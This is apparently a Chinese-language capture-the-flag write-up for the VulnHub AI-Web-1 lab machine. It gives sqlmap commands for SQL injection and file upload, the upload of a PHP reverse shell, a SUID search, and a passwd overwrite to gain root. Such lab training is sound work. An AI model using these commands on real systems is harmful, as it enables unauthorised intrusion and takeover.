下载链接:
官网下载地址:
https://www.vulnhub.com/entry/ai-web-1,353/
网盘下载地址:
链接:https://pan.baidu.com/s/1fIUVs3zLBCr1URm8ygC2fw?pwd=gsxq
提取码:gsxq
渗透测试
1.信息收集
1.1获取靶机ip
1.2端口扫描
给了个80端口而且是http服务
访问一下
1.3后台扫描
发现有一个robots.txt
看看里面有什么东西
依次访问
都没权限访问猜测是目录
继续扫描
m3diNf0这个下面有一个info.php
访问一下
看看另外一个目录
扫描一下这个/se3reTdir777/uploads目录
没有东西
这个目录没有东西我们扫描一下他的上一个目录/se3reTdir777
发现有两个文件,先访问index.php
输入一个1
发现爆出了一些东西
这里猜测是sql注入
burp抓一下包看看参数,sqlmap尝试跑一下
给这些请求信息塞文件里面去跑
2漏洞利用
sqlmap -r sql.txt --dbs --batch
sqlmap -r sql.txt -D aiweb1 --tables --batch
sqlmap -r sql.txt -D aiweb1 -T user --columns --batch
跑到这里就不用跑了,这些东西利用不了。
尝试拿一下shell
sqlmap -r sql.txt --os-shell
这里要绝对路径
之前有一个info.php的文件里面有路径
用以下这个路径:
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
拿到shell
尝试反弹。
这里就要用到kali里面自带的反弹shell文件了
路径:/usr/share/webshells/php下面的php-reverse-shell.php文件
给里面内容进行更改以下,就能用了。(按自己情况来)
把文件传到刚刚的路径去
sqlmap -r sql.txt --file-write test.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/test.php
本地监听刚刚设置的端口,在运行以下刚刚的传上去的文件
php test.php
3.本地提权
看一下哪些命令有root权限
find / -perm -u=s -type f 2>/dev/null
发现有passwd,尝试写入试试。
perl -le 'print crypt("123456","aa")'
写入成功,拿到root权限